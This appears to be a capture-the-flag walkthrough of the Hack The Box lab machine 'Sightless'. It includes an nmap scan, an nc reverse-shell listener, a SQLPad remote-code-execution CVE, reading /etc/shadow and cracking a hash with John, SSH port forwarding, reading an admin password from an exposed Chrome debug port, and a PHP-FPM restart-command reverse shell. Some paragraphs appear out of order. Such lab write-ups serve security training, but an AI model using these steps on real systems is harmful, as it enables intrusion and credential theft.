nmap -sC -sV -vv 10.10.11.32
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGoivagBalUNqQKPAE2WFpkFMj+vKwO9D3RiUUxsnkBNKXp5ql1R+kvjG89Iknc24EDKuRWDzEivKXYrZJE9fxg=
| 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA4BBc5R8qY5gFPDOqODeLBteW5rxF+qR5j36q9mO+bu
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://sightless.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
We see FTP, SSH telling us it's an Ubuntu server, and HTTP on nginx that is redirecting us to "sightless.htb" so let's add it to the /etc/hosts file and check the website.
Scrolling down to here, we see the SQLPad section, which redirects us to a new virtual host "sqlpad.sightless.htb" so let's add that too and check it.
First we will make a connection in the website, then click "test" and intercept it in Burp.
Exploitation
Then in Burp, we will add a new "data" parameter and make the POST data like:
Checking on our listener we get a shell as root, but we are on a docker container:
nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.16.26] from (UNKNOWN) [10.10.11.32] 43514
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c184118df0a6:/var/lib/sqlpad#
Enumearting around the container, we see a user called "michael" that is present, since we have root access we can read "/etc/shadow", get his password and try to crack it.
Getting his password and loading it into John, we can crack it easily and login via SSH.
john --show michael.hash
?:insanec<REDACTED>
1 password hash cracked, 0 left
Accessing the server via SSH, we got user.txt
michael@sightless:~$ wc -c user.txt
33 user.txt
ROOT
Enumearting in the machine we found port 8080 listening locally.
michael@sightless:~$ ss -natpl
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
<SNIP>
LISTEN 0 511 127.0.0.1:8080 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:40535 0.0.0.0:*
<SNIP>
Forwarding it to our box using SSH so we can access it like so:
ssh -L 8080:127.0.0.1:8080 michael@sightless.htb
And now going to localhost:8080 on our box, we see a froxlor instance:
Trying the old credentials we have but none worked, upon further enumeration on the box, we see a chrome debug port being used, by monitoring the processes, and checking the internal ports again, we try the ports in the 40000 range, we can access the debug port.
Then opening a chromium based browser we can go to "chrome://inspect" then click configure, and add the host and the port we have:
Clicking "Done" then we can see:
Inspecting it, we can see requests being made to the Froxlor website, checking the network tabs, we can see it's logging in and we can get the admin password.
And we get access to the admin dashboard.
root@sightless:~# ls
ls
docker-volumes
root.txt
scripts
root@sightless:~# wc -c root.txt
wc -c root.txt
33 root.txt
We see an instance of SQLPad running, googl-ing around we see a CVE for it that gives us RCE via the "api/test-connection" endpoint. If you wish you can use GitHub repo for it, but I will be doing the exploit manually in BurpSuite.
Going to PHP-FPM configuration tab, we can edit the restart command (""), so we made a bash 1 liner reverse shell, then making the restart command: "bash /tmp/vamp.sh". After that we can go restart the PHP-FPM setting from the system configuration tab, and we will get a reverse shell on our listener:
